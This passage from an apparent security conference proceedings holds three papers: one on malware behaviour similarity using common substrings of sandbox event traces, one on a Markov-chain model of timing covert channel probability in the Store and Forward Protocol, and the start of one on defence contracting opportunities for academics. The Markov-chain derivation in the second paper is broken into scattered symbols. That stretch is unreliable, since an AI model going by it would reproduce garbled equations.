instance within a cluster. One way to alleviate these issues is to, instead of determining similarity by<br />

using fixed size sequences as in previous work, develop techniques that are not tied to sequence<br />

length and automatically detect varied sized semantically-representative sequences.<br />

2


Jaime Acosta<br />

Some techniques that use semantic structure for finding similarity are in code-clone detection<br />

research. These techniques have been used to identify redundancy to reduce program size or to<br />

identify plagiarism in legitimate software (Roy and Cody, 2007). The problem with using these<br />

techniques for identifying similarity and differences in malware is that the source code of malware is<br />

not available. Some attempts have been made to analyze the sequences of instructions of<br />

disassembled binaries to determine whether they are malicious. One method compared the<br />

disassembled code against behavior templates that are known to exist in malware. These templates<br />

are able to capture malicious behavior, even if the malware has small variation (Christodorescu et al.,<br />

2005). Another method (Ye et al., 2007) uses the Intelligent Malware Detection System (IMDS), to<br />

identify malware instances by checking if certain sequences of Application Programming Interface<br />

(API) calls exist in a binary Portable Exchange (PE) file. A limitation of both of these examples is that<br />

they assume the binary file is not packed and is not virtualized.<br />

In this paper the longest common substring algorithm is modified and used to identify common event<br />

sequences of varying size among a set of malware. Also, the algorithm works on the dynamic traces<br />

of malware, which are evident even if the malware is packed or virtualized.<br />

3. Dataset<br />

3.1 Sandbox environment<br />

The dataset used for this research was obtained from the Malheur website (http://pi1.informatik.unimannheim.de/malheur/)<br />

and was collected over a period of three years. In particular, the Reference<br />

dataset is used, which consists of the dynamic trace events of 3131 malware instances that are<br />

grouped into 24 types, as assigned by six anti-virus scanners. The dynamic traces of the malware<br />

instances were generated by CWSandbox. The event traces range in size from 700 B to 3.4 MB. The<br />

traces are encoded in the Malheur instruction set (MIST) format and are in sequential order.<br />

Furthermore, the traces are separated by thread behaviors of the executable.<br />

3.2 MIST<br />

The dynamic trace of the malware instances in the dataset are logs of the events that occurred as the<br />

result of the execution of the malware binary. The logs contain details about each event that may be<br />

of different levels of interest to an analyst, or to analysis software. MIST encodes events in a format<br />

that will prioritize log details, e.g., filenames, sleep delay times and memory addresses associated<br />

with each event trace. In total there are 120 system calls that fall into 13 more general categories<br />

(e.g., winsock_op, file_open system calls are both in the winsock category). An extensive description<br />

and examples of MIST are presented in (Trinius et al., 2010).<br />

4. The common substrings algorithm<br />

The algorithm developed to identify shared behaviors in malware instance event traces is a modified<br />

version of the well-known longest common substring algorithm (Cormen et al., 2001). The main<br />

difference is that in the modified version, all common substrings of a minimum length are identified,<br />

instead of only the longest.<br />

There are two main procedures that are executed to find the amount of shared behavior in the<br />

malware instances. Figure 1 is the reduction procedure that calculates the amount of common<br />

behavior in the event traces. In line 2, all common substrings are stored in the commonSubstrings<br />

variable. In order to efficiently process the files, this step was first run on instances that were labeled<br />

in the same malware class, i.e., all event traces within the ALLAPLE malware instances (as assigned<br />

by anti-virus software) were compared first, then all EJIK traces, etc.<br />

In lines 3-4, the commonSubstrings are sorted in descending order and output to a file. This allows<br />

the commonsSubstrings to be used to find commonality with other datasets. In lines 5-9, the<br />

occurrences of all strings in commonSubstrings of at least size min are identified in the largeFileSet.<br />

They are then counted and removed. Removing the occurrences in the largeFileSet allows calculating<br />

the amount of common behavior that exists in these malware instances (line 10).<br />

3


Figure 1: The reduction procedure<br />

Jaime Acosta<br />

The CommonSubstring procedure (Figure 2) starts by reading the event traces from two input files<br />

(lines 1-5). In the case that the next event sequences match in the two files, a temporary string,<br />

currSubstring, keeps track of the matching sequences (lines 12-24). When the event sequence is<br />

dissimilar in the two files, the current common substring, currSubstring, is stored if it is unique (8-10)<br />

and finally cleared (11). For this research, a hash table was used to ensure that only unique instances<br />

are stored. Lastly, all common substrings found are returned to the calling procedure in line 25.<br />

Figure 2: The CommonSubstring procedure<br />

In practice, because the malware instances share a high amount of common behaviors, the storage<br />

space required to save the unique common substrings is small (less than 50 MB using substrings<br />

greater than or equal to 2).<br />

5. Experimental setup<br />

In order to determine whether common behavior exists in the malware instances, the Reference<br />

dataset was separated into two sets: small and large. The small set contained 2071 instances of<br />

malware that are less than 100 KB in size. The large set contained 1060 instances of malware that<br />

were between 100 KB and 4 MB in size. For this research, only the malware size, not the type as<br />

4


Jaime Acosta<br />

assigned by an anti-virus scanner, were used when separating the dataset. For the most part, the<br />

malware types for small and large sets are different. Table 1 shows more details on the dataset and<br />

how it was partitioned.<br />

Table 1: Details on small and large sets<br />

Small Set Large Set<br />

Total # event trace files 2,071 1,060<br />

Total # events 1,217,985 17,400,262<br />

Total size of event trace files 44 MB 490 MB<br />

The smaller dataset was used for capturing the set of common substrings in the hopes that large<br />

complex malware instances may be broken down into behaviors that exist in small malware. For<br />

example, it may be the case that part of a malware instance exhibits the behavior of a trojan to collect<br />

data and may also self-replicate like a worm virus.<br />

The level of detail needed when finding common behavior among malware instances was based on<br />

Rieck et al.’s (2010) work. In their experiment, they found that the best configuration for clustering<br />

malware instances was realized when using MIST level 1. This means that only the event names, not<br />

any other details such as parameters, from the traces were used when searching for common<br />

behaviors. Although his method compared fixed size event q-grams, the methods in this experiment<br />

are similar; therefore MIST level 1 was used.<br />

The Reduction algorithm presented in Figure 1 was first run on the small set. In order to more<br />

efficiently process the data, the input was split into four equal size chunks and was processed<br />

concurrently on four computers. After the common substrings from the small set were captured, the<br />

next step was to determine the common behavior that occurs in the large file set.<br />

6. Results<br />

The results show that there is much common behavior among the malware instances. From an<br />

analyst’s point of view, the preferred case is that longer substrings are prevalent among the malware<br />

because these longer substrings most likely capture more semantically rich behavior blocks. If the<br />

substrings are all too short, the effect would be less interesting because it would take almost the same<br />

amount of effort to analyze event traces.<br />

In order to help investigate what is actually happening in the data, the experiment was run several<br />

times using different allowable minimum lengths to identify common substrings. For example, if the<br />

allowed minimum length is six event sequences, all common substrings less than size six are ignored<br />

and are not removed from the large set. Therefore, the reduction percentage, in this example, would<br />

only be based on substrings size six and greater. Figure 3 shows the results for minimum lengths<br />

ranging from 2 to 100.<br />

The graph shows that when only considering substrings of length at least 12, half of the large dataset<br />

can be accounted for using the common substrings in the small set. This indicates that by starting on<br />

small traces, an analyst can break down a large complex trace by removing common behaviors.<br />

When using a minimum length of 24, it seems the restriction is too great; only 30% is accounted for in<br />

the large set, but this also signifies that the dataset represents a reasonable distribution of dissimilar<br />

malware. If the malware all showed high level of similar behavior with many long sequences, it may<br />

be the case that the collected malware is not a good representation of different types of malware. For<br />

example, when looking at some of the longest common substrings found within the small set, it was<br />

sometimes the case that two malware differed only by a few events. Further investigation revealed<br />

that these two malware instances were of the same type and only differed probably to confuse a<br />

hash-based virus scanner.<br />

When using a minimum size of two, 96% of the large dataset is accounted for, but this is not practical<br />

because most of the shared sequences are short. This is evident because the percentage of shared<br />

behavior drops as the sequence minimum increases.<br />

5


Jaime Acosta<br />

Figure 3: Average percentage of the large set that is accounted for by common substrings of the<br />

small set<br />

7. Conclusions and future work<br />

This paper has provided a technique that can be used for similarity analysis on malware, based on<br />

dynamic behavior that was captured using CWSandbox. The results show that the similarities are not<br />

restricted to small sequences; many large sequences are shared among the malware instances,<br />

which mean that there are in fact many shared behaviors present that could be identified and possibly<br />

labeled using natural language to reduce an analyst’s workload, matching the intentions of Kirillov et<br />

al. (2010).<br />

Future work will test the methods described in this paper with a larger dataset. In addition, instead of<br />

limiting the process to sequential instructions, it may be useful to instead identify templates of<br />

behavior, as Christodorescu et al. (2005) did for static malware analysis. For example, there may be a<br />

trace that contains a sequence of five wait events and another with ten. Semantically, these are<br />

almost equivalent, but the common substring algorithm presented here does not capture this; a<br />

template method could. Tailoring to malware some techniques used in identifying code clones, such<br />

as in (Roy and Cody, 2007) may also prove useful.<br />

The work described here is an initial step for a tool that can be used to semantically label portions of<br />

files to allow for more efficient identification of both redundancy (use of legitimate 3 rd party libraries)<br />

and overlap (reuse of malware code) in malware instances.<br />

Acknowledgments<br />

I would like to thank Victor Mena, Ken Fabela, and Michael Shaughnessy for their valuable comments<br />

and suggestions that led to the maturation of this work. Also, I would like to thank Konrad Rieck and<br />

colleagues for the dataset and feedback.<br />

References<br />

Baecher, P., Koetter, M., Holz, T., Dornseif, M. and Freiling, F. (2006) “The Nepenthes platform: An efficient<br />

approach to collect malware”, Recent Advances in Intrusion Detection, No. 4219, pp 165–184.<br />

Bayer, U., Comparetti, P.M., Hlauschek, C., Kruegel, C. and Kirda, E. (2009) “Scalable, behavior-based malware<br />

clustering”, Network and Distributed System Security Symposium (NDSS).<br />

Bayer, U., Moser, A., Krügel, C. and Kirda, E. (2006) “Dynamic analysis of malicious code”, Journal in Computer<br />

Virology, Vol. 2, No. 1, pp 67–77.<br />

Christodorescu, M., Jha, S., Seshia, S. A., Song, D. and Bryant, R.E. (2005) “Semantics-Aware Malware<br />

Detection”, IEEE Symposium on Security and Privacy, pp 32–46.<br />

6


Jaime Acosta<br />

Cormen, T.H., Leiserson, C.E., Rivest, R.L., Stein, C. (2001) Introduction to Algorithms, The MIT press.<br />

Cornelissen, B. (2009) “Evaluating Dynamic Analysis Techniques for Program Comprehension”, Delft University<br />

of Technology.<br />

Göbel, J. G. (2009) “Amun: Python honeypot”, http://amunhoney.sourceforge.net.<br />

Han, S., Lee, K. and Lee, S. (2010) “Packed PE File Detection for Malware Forensics”, Second International<br />

<strong>Conference</strong> on Computer Science and its Applications (CSA), pp 1–7.<br />

Jang, J. and Brumley, D. (2009) “BitShred: Fast, Scalable Code Reuse Detection in Binary Code”, CMU-CyLab,<br />

pp 28–37.<br />

Kasina, A., Suthar, A. and Kumar, R. (2010) “Detection of Polymorphic Viruses in Windows Executables”,<br />

Contemporary Computing, pp 120–130.<br />

Kirillov, I., Beck, D., Chase, P., and Martin, R. (2010) “Malware Attribute Enumeration and Characterization”,<br />

http://maec.mitre.org/.<br />

Lee, J., Jeong, K., and Lee, H. (2010) “Detecting metamorphic malwares using code graphs”, ACM Symposium<br />

on Applied Computing, pp 1970–1977.<br />

Norman Solutions (2003), “Norman sandbox whitepaper”<br />

http://download.norman.no/whitepapers/whitepaper_Norman_SandBox.pdf<br />

Provos, N. (2004) “A virtual honeypot framework”, USENIX Security Symposium, Vol. 13, pg 1.<br />

Rieck, K., Trinius, P., Willems, C. and Holz, T. “Automatic Analysis of Malware Behavior using Machine<br />

Learning”, Journal of Computer Security (JCS), to appear 2010.<br />

Roy, C.K. and Cordy, J.R. (2007) “A survey on software clone detection research”, Queen’s School of Computing<br />

TR, Vol. 541, pg 115.<br />

Sharif, M., Lanzi, A., Giffin, J. and Lee, W. (2009) “Automatic reverse engineering of malware emulators”, IEEE<br />

Symposium on Security and Privacy, pp 94–109.<br />

Trinius, P., Willems, C., Holz, T. and Rieck, K. (2010) “A Malware Instruction Set for Behavior-based Analysis”,<br />

Sicherheit 2010, pp 205–216.<br />

Vinod, P., Jaipur, R., Laxmi, V. and Gaur, M.S. (2009) “Survey on malware detection methods”, Hack, pg 74.<br />

Willems, C., Holz, T., Freiling, F. (2007) “Toward automated dynamic malware analysis using CWSandbox”, IEEE<br />

Security and Privacy, Vol. 5, No. 2, pp 32–39.<br />

Ye, Y., Wang, D., Li, T., Ye, D. and Jiang, Q. (2007) “An intelligent PE-malware detection system based on<br />

association mining”, Journal in computer virology, Vol. 4, No. 4, pp 323–334.<br />

7


Modeling and Justification of the Store and Forward<br />

Protocol: Covert Channel Analysis<br />

Hind Al Falasi and Liren Zhang<br />

United Arab Emirates University, Al Ain, United Arab Emirates<br />

hindalfalasi@uaeu.ac.ae<br />

lzhang@uaeu.ac.ae<br />

Abstract: In an environment where two networks with different security levels are allowed to communicate, a<br />

covert channel is created. The paper aims at calculating the probability of establishing a covert channel between<br />

the high security network and the low security network using Markov Chain Model. The communication between<br />

the networks follows the Bell-LaPadula (BLP) security model. The BLP model is a “No read up, No write down”<br />

model where up indicates an entity with a high security level and down indicates an entity with a low security<br />

level. In networking, the only way to enforce the BLP model is to divide a network into separate entities, networks<br />

with a low security level, and others with a high security level. This paper discusses our analysis of the Store and<br />

Forward Protocol that enforces the BLP security model. The Store and Forward Protocol (SAFP) is a gateway<br />

that forwards all data from a low security network to a high security network, and it sends acknowledgments to<br />

the low security network as if they were sent from the high security network; thereby achieving reliability of the<br />

communication in this secure environment. A timing covert channel can be established between the two networks<br />

by using the times of the acknowledgments to signal a message from the high security network to the low<br />

security network. A high security network may send acknowledgments immediately or with some delay where the<br />

time of the acknowledgments arrival is used to convey the message. The covert channel probability is found to be<br />

equal to the blocking probability of the SAFP buffer when analyzing the problem using Markov Chain Model.<br />

Increasing the size of the buffer at the SAFP decreases the covert channel probability. Carefully determining the<br />

size of the buffer of the SAFP ensures minimizing the covert channel probability.<br />

Keywords: covert channel, access model, Markov Chain Model, store and forward protocol<br />

1. Introduction<br />

Covert channels may be introduced to secure networks both intentionally and unintentionally.<br />

Consider a computer system were two networks with different security levels are communicating; the<br />

existence of covert channels can compromise the efforts exerted to prevent access to higher security<br />

level information by a lower security level network. Security procedures should be established to<br />

prevent the lower network from reading the higher network files, and ensure that the higher network<br />

cannot write to the lower network files. We are referring to a multilevel secure setting where different<br />

networks have different security levels. The notion of having rules that state “No read up", and "No<br />

write down” is in accordance with the BLP security model (Bell and LaPadula 1973). The model's<br />

security procedures make it mandatory for information to flow from the low security network to the<br />

high security network only.<br />

In this paper we are interested in one type of covert channel, a timing channel. In timing channels,<br />

information is transmitted by the timings of events (Wray 1991). This channel is established whenever<br />

the higher network is able to hold up the SAFP (Kang and Moskowitz 1995) response time to signal<br />

an input to the lower network. An acknowledgement sent by the SAFP to the lower network without<br />

delay means no message; however, if the acknowledgment is sent with delay, the value of the delay<br />

is translated by the lower network as an alphabet. Therefore, a communication channel is established<br />

between the two networks with the output constructed from the different delay time values. The<br />

medium in which the covert channel exists is the network environment in our channel i.e. network<br />

covert channel (Cabuk et al., 2009). The channel manages to control the timing of legitimate network<br />

traffic to allow the leaking of confidential data. The purpose of the covert channel analysis is to<br />

calculate the best size buffer for the SAFP to minimize the probability of the covert channel<br />

establishment.<br />

2. Background and motivation<br />

Information flow between two networks with different security levels should not only be governed by<br />

the rules of the BLP security model. An integral part of implementing the BLP security model is<br />

ensuring that any weaknesses of the system implementing the model do not defeat the purpose<br />

behind it. Being able to identify the circumstances that lead to establishing a covert channel between<br />

the two communicating networks is the first step towards eliminating the covert channel. The<br />

importance of identifying the existence of covert channels stems from the fact that they are used to<br />

8


Hind Al Falasi and Liren Zhang<br />

transfer information secretly, where the ultimate goal of covert channels is to conceal the very<br />

existence of the communication (Zander et al., 2007).<br />

The capacity of the covert channel was analyzed as a function of buffer size and moving average size<br />

by Kang and Moskowitz (Kang and Moskowitz, 1993; 1995). The analysis was performed on a Pump<br />

that used randomized acknowledgments which are also used to control the input rate of a source. In<br />

addition, several protocols were reviewed and implemented (Kang and Moskowitz, 1993), and the<br />

proposed protocols in their work were designed to reduce the bandwidth of covert channels.<br />

3. Store and Forward Protocol (SAFP)<br />

The Store and Forward protocol is a simple protocol used for reliable communication between two<br />

networks. The protocol effectiveness is limited in minimizing the existence of covert channels.<br />

However, we use it in this paper as a benchmark to calculate the probability of a timing covert channel<br />

as the advantage of the protocol is in its simplicity to analyze.<br />

The idea behind this protocol is simple: There are two networks communicating, one network has a<br />

low security level, and the other has a high security level. There is a gateway between the two<br />

networks. The gateway does the following job: it receives a packet from the low security network,<br />

stores it in a buffer, and then sends an acknowledgment to the low security network indicating the<br />

successful receipt of that packet. The gateway then forwards the packet to the high security network<br />

and waits for an acknowledgment of receipt. If no such acknowledgment is received, the gateway<br />

retransmits the packet to the high security network. Only after the receipt of the acknowledgment<br />

does the gateway delete that packet from its buffer.<br />

All traffic from the high security network is ignored except for the acknowledgments. This notion is in<br />

accordance with the BLP security model which is a “No read up, No write down” model where up<br />

indicates an entity with high security level and down indicates an entity with low security level. The<br />

gateway forwards all data from the low security network to the high security network, and it does not<br />

forward acknowledgments from the high security network to the low security network; however, it<br />

achieves reliability of the communication by sending acknowledgments to the low security network<br />

(Figure 1).<br />

Figure 1: Store and Forward Protocol (SAFP)<br />

3.1 The covert channel<br />

The problem with the store and forward protocol is that it permits covert channels to exist between the<br />

high security network and the low security network through the acknowledgments. A timing covert<br />

channel can be established between the two networks by using the time values of the<br />

acknowledgments to signal a message from the high security network to the low security network. A<br />

high security network may send acknowledgments immediately or with some delay where the value of<br />

the delay is used to convey the message.<br />

3.2 TCP sliding window effect<br />

The SAFP notifies the low security network of the number of bytes it is willing to receive, which then<br />

becomes the low security network send window. On the other side, the high security network notifies<br />

the SAFP of the number of bytes it is willing to receive, which then becomes the SAFP send window.<br />

At first glance, the use of TCP's sliding window appears to reduce the probability of the covert channel<br />

by minimizing the number of acknowledgments. The low security network can send several packets<br />

without waiting for acknowledgments. Similarly, the high security network can acknowledge several<br />

9


Hind Al Falasi and Liren Zhang<br />

packets at once. Therefore, for every sequence of packets sent, only one piece of useful information<br />

is sent via one acknowledgment. However, the high security network can set the size of the sliding<br />

window to one which requires that every packet is acknowledged before the next one is sent, sending<br />

us back to square one.<br />

4. The covert channel analysis<br />

4.1 Notations<br />

The following acronyms are used in the paper: LSN stands for Low Security Network, and HSN<br />

stands for High Security Network.<br />

Table 1: The table contains the notations we will use throughout the paper, and in the illustration<br />

figures<br />

4.2 Assumptions<br />

LSN SAFP: λ 1<br />

SAFP LSN:µ1<br />

LSN SAFP = T1<br />

LSN SAFP = α1<br />

RL: Ack rate from SAFP LSN<br />

Arrival Rate = λ<br />

Service Rate = µ<br />

Packet Size = Ri<br />

Queuing Delay = q<br />

Transmission delay = Tx<br />

Propagation Delay:<br />

Acknowledgement Rate (Ack/sec):<br />

SAFP HSN: λ 2<br />

HSN SAFP: µ2<br />

SAFP HSN = T2<br />

SAFP HSN = α2<br />

RH: Ack rate from HSN SAFP<br />

T1 and T2 of the acknowledgment packets are ignored because the packet size is small. In addition,<br />

the processing (service) time at SAFP is negligible.<br />

4.3 Discussion<br />

In this section, we investigate the time it takes one packet to travel from the low security network to<br />

the high security network. In addition, we investigate the time it takes an acknowledgement of the<br />

packet to reach the SAFP; as well as the time an acknowledgment from the SAFP to low security<br />

network takes to reach its destination. Calculating the time from the SAFP point of view; the i th packet<br />

is received at α1 + T1. Moreover, the i th packet is deleted from the buffer at α1 + T1 + 2α2 + T2 + 1/ µ2,<br />

where α1 represents the propagation delay of the packets sent between the low security network and<br />

the SAFP. Similarly, α2 represents the propagation delay of the packets sent between the SAFP and<br />

the high security network. T1 and T2 represent the transmission delay from the low security network to<br />

the SAFP, and the SAFP and the high security network, respectively. Finally, 1/ µ2 is the service time<br />

at the high security network.<br />

When we take the distance between the SAFP gateway and the high security network into<br />

consideration, the time a packet stays in the SAFP buffer changes. For example, if the distance is<br />

very large, then we can ignore T2 and 1/ µ2. Therefore, the i th packet is deleted from the buffer at α1 +<br />

T1 + 2α2. As a result, the ability of the high security network to control the acknowledgment rates;<br />

10


Hind Al Falasi and Liren Zhang<br />

therefore, creating a covert channel diminishes. The service time at the high security network is the<br />

only factor under the control of the high security network. The other elements are controlled by the<br />

physical environment of the network. On the other hand, if the distance between them is small, we<br />

estimate that the i th packet is deleted from the buffer at α1 + T1 + T2 + 1/ µ2.<br />

Another element to consider is the high security network service time, which affects the SAFP<br />

queuing time. We are considering this element because it leads to the establishment of a timing<br />

covert channel between the high security network and the low security network. A slow service time<br />

eventually leads to a full buffer at the SAFP. In other words, packets from the low security network are<br />

lost; therefore, no acknowledgments are sent from the SAFP to the low security network. From there,<br />

the high security network can control the SAFP buffer; subsequently, it can control the rate of the<br />

acknowledgments from the SAFP to the low security network. Therefore, it can use the delays to<br />

signal messages to the low security network. The SAFP buffer is modeled using the M/M/1/K model<br />

as it has a finite capacity where the maximum number of packets in the buffer is K. A packet enters<br />

the queue if it finds fewer than K packets in the buffer and is lost otherwise. The probability of a full<br />

buffer = blocking probability = probability of a covert channel. An illustration of the above scenario is<br />

presented in Figure 2.<br />

Figure 2: Communication representation between low security network, SAFP and high security<br />

network<br />

5. Analysis of the system using Markov chain model<br />

Using the state transition diagram (see Figure 3), we found the blocking probability of the SAFP buffer<br />

(PK):<br />

Solving the equations in terms of P0:<br />

p<br />

p<br />

p<br />

(<br />

1<br />

2<br />

k<br />

1<br />

2<br />

p<br />

1<br />

0<br />

p<br />

K<br />

1<br />

2<br />

1<br />

2<br />

1<br />

2<br />

2<br />

p<br />

0<br />

2<br />

k<br />

2<br />

) p<br />

1<br />

p<br />

p<br />

k<br />

p<br />

1<br />

p<br />

0<br />

0<br />

K 1<br />

1<br />

p<br />

k 1<br />

k<br />

k<br />

P<br />

K<br />

0<br />

1<br />

2<br />

p<br />

1<br />

2<br />

k 1<br />

K<br />

p<br />

0<br />

k<br />

1<br />

k<br />

0<br />

k<br />

K<br />

K<br />

1<br />

11<br />

(1)<br />

(2)<br />

(3)


Solving for PK:<br />

K<br />

Pk<br />

p0<br />

K<br />

1<br />

k 0 k 0 2<br />

p<br />

k<br />

1<br />

2<br />

k<br />

p<br />

0<br />

k<br />

1<br />

p<br />

p<br />

0<br />

k<br />

Hind Al Falasi and Liren Zhang<br />

k<br />

k<br />

K<br />

K<br />

1<br />

0 2<br />

1<br />

2<br />

1<br />

1<br />

0 2<br />

k<br />

k<br />

k<br />

*Where PK = PB = Probability an arriving packet is turned away due to full buffer = Probability of a<br />

covert channel.<br />

Figure 3: Markov chain model of the SAFP queue<br />

6. Results<br />

Figure 4 provides an overview of the relationship between the blocking probability and the size of the<br />

SAFP buffer. We are assuming the simplest possible scenario, where the arrival rate is twice as fast<br />

as the service rate. Starting with a buffer with size 0, the blocking probability is 1.<br />

Figure 4: Pk vs. K<br />

This is understandable, as at this point the SAFP is turning away every packet, due to lack of storage<br />

place. When the size of the buffer is 2, we calculate a probability of a covert channel which is more<br />

than 50%. While the probability slightly decreases as we increase the size of the buffer, we find that<br />

12<br />

(4)<br />

(5)


Hind Al Falasi and Liren Zhang<br />

the value stabilizes at 0.5 where the change in the blocking probability value is negligible. When the<br />

buffer size exceeds 10, one packet will be serviced and one will be blocked no matter what. As long<br />

as the arrival rate is twice the service rate, whenever a packet from the buffer is accepted to be<br />

serviced, room is made for one packet to enter the buffer. This explains the 0.5 blocking probability.<br />

The blocking probability decreases as the buffer size increases because fewer packets are turned<br />

away, due to a full buffer. When a packet enters the SAFP queue, an acknowledgment of receipt is<br />

sent from the SAFP to the low security network, which means there is no delay that can interpreted as<br />

a message from the high security network. If we desire a blocking probability of 0.5, then we need a<br />

buffer capable of holding at least 10 packets.<br />

7. Conclusion<br />

We examined the SAFP protocol, which is used to provide reliability of communication between two<br />

networks with different security levels. We argued that a timing covert channel can exist between the<br />

two networks, given the possibility that malicious users are able to control the acknowledgments<br />

arrival time. We analyzed the timing of the packets flowing between the two networks and the SAFP,<br />

and the probability of the covert channel between the low security and high security network. The<br />

purpose of our covert channel analysis was to calculate the best size buffer for the SAFP to keep the<br />

probability of the covert channel to minimum which we found dependent on the arrival rate of LSN<br />

packets and the service rate at the HSN. We have created a mathematical model to calculate the<br />

covert channel probability and define the factors that affect the probability with increase or decrease.<br />

One of our future plans includes building a mathematical model for a Data Pump (Kang and<br />

Moskowitz, 1993; 1995).<br />

References<br />

Bell, D. and LaPadula, L. (1973) Secure Computer Systems: Mathematical Foundation. ESD-TR-73- 278, Vol.1,<br />

Mitre Corp.<br />

Bolch, G., Greiner, S., DeMeer, H. and Trivedi, K.S. (2006) Queueing Networks and Markov Chains: Modeling<br />

and Performance Evaluation with Computer Science Applications. Second Edition, Wiley Interscience,<br />

Hoboken, NJ.<br />

Cabuk, S., Brodley, C., and Shields, C. 2009. IP Covert Channel Detection. ACM Transactions on Information<br />

System Security, Volume 12, Issue 4 (Apr. 2009), pp. 129.<br />

Kang, M. and Moskowitz, I. (1995) A Data Pump for Communication. NRL Memo Report 5540-95-7771.<br />

Kang M. and Moskowitz, I. (1993) A Pump for Rapid, Reliable, Secure Communication. Proceedings ACM Conf.<br />

Computer and Comm. Security '93, Fairfax, VA, pp.119-129.<br />

Ogurtsov, N., Orman, H., Schroeppel, R., O’Malley, S., and Spatscheck, O. (1996) Covert Channel Elimination<br />

Protocols. Technical Reports TR96-14. Department of Computer Science, University of Arizona.<br />

Wray, J. C. (1991) An Analysis of Covert Timing Channels. Research in Security and Privacy. Pages 2-7.<br />

Zander S., Armitage, G. and Branch, P. (2007) Covert Channels and Countermeasures in Computer Network<br />

Protocols. Communications Magazine, IEEE. Vol.45. Pages 136-142.<br />

13


The Evolution of Information Assurance (IA) and<br />

Information Operations (IO) Contracts across the DoD:<br />

Growth Opportunities for <strong>Academic</strong> Research – an Update<br />

Edwin Leigh Armistead 1 and Thomas Murphy 2<br />

1 Goldbelt Hawk LLC and Norwich University, USA<br />

2 NorthLight Technologies, USA<br />

larmistead@gbhawk.com<br />

earmiste@norwich.edu<br />

tmurphy@rochester.rr.com<br />

Abstract: Four years ago, the authors presented a paper at the ICIW conference in Monterey, CA (Armistead &<br />

Murphy, 2007) that outlined opportunities for academics and researchers with regard to IO (Information<br />

Operations), IW (Information Warfare) and IA (Information Assurance) contracts across the Department of<br />

Defense (DoD) and Federal government (USG). The original paper highlighted a differential in contracts available<br />

and the current opportunities were at that time. Specifically, that paper predicted what the future may hold for<br />

further growth in these areas and how growth of IO, IA and IW contract vehicles can benefit universities and<br />

academics from a funding aspect. Finally, the original paper also suggested future areas of research that<br />

academics may be interested in exploring, to best optimize their ability to secure grants and contracts over the<br />

next few years. This paper is not only an update to the original research, to review the original hypothesis and<br />

determine if the predictions from four years ago were correct, but it also mines new data sources to take a fresh<br />

look at current contracts. In this research, the authors analyze the growing new opportunities in cyber warfare,<br />

strategic communications, psychological operations and cyber security. The scope of IO / IA is also expanding<br />

farther into areas of diplomacy, economics, and homeland security, while growing even more central to complex<br />

unconventional and conventional warfare applications. In addition, organizational change is accompanying these<br />

doctrinal and application area changes, which has led to a subsequent revision of the contract opportunities<br />

available. Likewise, new revisions of policy and documentation are also expected to arrive in the foreseeable<br />

future, which could lead to a deeper understanding and appreciation of cultural values and psychological roles<br />

among the multiple political players. In this review, we explore what new and promising opportunities for<br />

collaboration exist for academics, and we hope that this paper can alert researchers to alternate opportunities for<br />

funding in the IO and IA arena that they may not have considered previously.<br />

Keywords: information assurance, information operations, Department of Defense, contracts, proposals<br />

1. Introduction<br />

For many academics, funding is always a constant pursuit. With the current recession, grants and<br />

other non-profit opportunities may have become more limited than in previous time periods. In this era<br />

of fiscal constraint, this paper examines another method of obtaining funds for academics that should<br />

be considered. Specifically, the authors are interested in the opportunities that lay within the realm of<br />

DoD and Federal contracting, where academics can act as consultants to the companies that are<br />

supporting these entities. In some cases, this can be quite a lucrative venture, and if offers other<br />

avenues besides grants and academic scholarships, to offset the financial needs of the tenured<br />

scholar. Therefore, this paper reviews the types of research areas that have experienced the most<br />

growth, as well as areas that will experience future growth. We identify the DoD and Federal<br />

contractors that have the best success in obtaining contracts in the IA and IO areas. We give<br />

extensive details of the global and United States Government (USG) environment, which drive the<br />

security business as well. The authors also discuss how the USG and interagency interactions<br />

influence contracting policies and awards. Understanding all of the forgoing factors and strategies will<br />

allow the academic researcher to formulate targeted business plans to employ in their search for<br />

additional funding.<br />

2. IA and IO business growth areas – players, relationships and influences<br />

The Federal IA segment is characterized by agency management that is policy, doctrine and<br />

reputation motivated.<br />

Civilian agencies IT security directives are driven by the magnitude, not by the quantity of events.<br />

Overriding political priorities mitigate new government-wide IT security legislation. Trade-offs of<br />

efficiency and effectiveness with security-privacy differs with department.<br />

14


Edwin Leigh Armistead and Thomas Murphy<br />

Agency Corporate Information Security Officers struggle with choosing to simply use a<br />

compliance scorecard or going farther to secure their enterprise. It is easier to say you are<br />

compliant than to prove you are secure. Both are necessary to deliver cost effective solutions.<br />

Department level initiatives drive security agendas. Each USG department has separate<br />

initiatives, which in turn drive their emphasis or lack of emphasis on IA.<br />

Trends in security focus following the path of Perimeter security, then Data security and most<br />

recently Coding security. This end-to-end focus on secure design, development and<br />

implementation is becoming common in all market segments.<br />

Information Systems Security Lines of Business is not expected to cannibalize short term vendor<br />

sales<br />

Demand for Integrated Security Services is growing. Standalone (Point) security opportunities are<br />

on the decline.<br />

Federal agencies still separate IT and physical services. Merger of IT and physical security is<br />

impeded by silos of excellence. Successful contract teams will be able to assist in integrating total<br />

security services.<br />

The Commercial IA segment of the security industry is characterized by an upper management that is<br />

litigation and profit motivated. Major trends are similar to the Federal segment. Secondly, there is a<br />

very rapid consolidation of best industry players. Cyber security firms are motivated to rapidly develop<br />

and offer full suites of integrated and managed services to meet the demand for full services. Large IT<br />

and network organizations can successfully merge with smaller IA firms if the ingenuity of the “pureplay”<br />

or point (individual security component supplier) IA firm is not lost. This is a particularly<br />

advantageous route to speed up the number and scope of offerings and to acquire experienced IA<br />

and Information Security (InfoSec) personnel who are in short supply. It is reasonable to expect<br />

similar motivation and actions in the Federal IA market for the same reasons. Thirdly, there are<br />

external factors, including a continuing rise in cybercrime, which follows the earlier increase in<br />

terrorism. Significant increases (greater than 200%) in cyber crimes occurred over the last two years.<br />

Over 100 million data records have been lost or stolen. The average cost of each data record loss is<br />

about $180/record giving a total estimate of $18 Billion lost over the period of two years, high<br />

motivation to client and criminal alike. There is also a modest trend toward offering cyber and physical<br />

security in packages of offerings.<br />

Agencies and firms increasingly outsource more security activities each year. They determine that<br />

they can achieve cost savings or a higher level of security at the same cost and tend to increase their<br />

outsourcing budgets over time. The firms that do outsource all or part of their IT security activities will<br />

see an increase in their level of security per dollar of investment. Surprisingly, although they don’t<br />

realize it, agencies and firms that outsource Security Services are also likely to benefit from each<br />

other’s decisions to outsource. IT security outsourcing has been shown to result in a reduction in the<br />

firms production costs and a freeing up of other resources. (Outsourcing refers to the relationship<br />

between a firm and another firm it pays to conduct security activities on its behalf). However, without<br />

careful planning and due diligence, the clients return on investment in outsourcing IT security could be<br />

reduced or become negative as a result of a variety of potential costs including both strategic risks<br />

